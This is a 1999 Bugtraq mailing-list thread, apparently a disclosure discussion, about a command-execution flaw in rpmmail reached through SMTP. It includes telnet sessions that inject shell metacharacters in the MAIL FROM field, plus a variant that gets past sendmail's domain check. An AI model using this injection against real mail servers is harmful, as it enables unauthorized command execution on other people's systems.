Re: RH6.0 local/remote command execution

[btellier () WEBLEY COM (Brock Tellier)]

There seems to be some confusion regarding this post.  Let me try to
explain.

This post is titled "RH6.0 local/remote command execution" only because
rpmmail is distributed on the RH6.0 Extra Applications CD. You can, of
course, install rpmmail on any other linux variant, such as SuSE, which
is what I did.  I believe I made this clear when I pasted:

> bash-2.03$ cat /etc/SuSE-release;uname -a;id
> SuSE Linux 6.2 (i386)
> VERSION = 6.2
> Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
> uid=100(xnec) gid=100(users) groups=100(users)

In any case, as "D" pointed out,

> MAIL FROM: ;/command/to/execute;
> 553 ;/command/to/execute;... Domain name required
> MAIL FROM: ;/command/to/execute;@microsoft.com
> 250 ;/command/to/execute;@microsoft.com... Sender ok

should work on sendmail 8.9.3.

-Brock

> That does not look like the MTA that comes with RH 6.0. That is smail
not
> sendmail. I tryed this on my RH 6.0 install and it didn't work.
> Notice the "220 fear62 Smail-3.2"
> It's not sendmail.
>
>
> -----Original Message-----
> From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of
Neezam
> Haniff
> Sent: Wednesday, October 06, 1999 12:50 PM
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: RH6.0 local/remote command execution
>
>
> Hi,
>
> Here are some comments below...
>
> > The remote exploit is merely:
> > bash-2.03$ telnet localhost 25
> > Trying 127.0.0.1...
> > Connected to localhost.
> > Escape character is '^]'.
> > 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
> 11:31:13 -0500
> > (CDT)
> > MAIL FROM: ;/command/to/execute;
> > 250 <;/command/to/execute;> ... Sender Okay
> > RCPT TO: rpmmail
> > 250 <rpmmail> ... Recipient Okay
> > data
> > 354 Enter mail, end with "." on a line by itself
> > .
> > 250 Mail accepted
> > quit
>
> I find this odd that this exploit could exist on a Red Hat 6.0
installation.
> sendmail 8.9.3 is the mailer that is installed and the way it's been
> configured, there's no way it would accept that sender address since
it's
> not qualifiable. Please confirm this. This is what I get when I test
this
> scenario on a Red Hat 6.0 system:
>
> [> [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
> 13:31:55 -0400
> helo x.x
> 250 dhcp-160-190.x.x Hello IDENT:> 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased
to
> meet you
> MAIL FROM: ;/command/to/execute;
> 553 ;/command/to/execute;... Domain name required
>
> The only way someone could take advantage of this exploit is if their
mailer
> configuration allows for the sender to non-qualifiable.
>
> Neezam.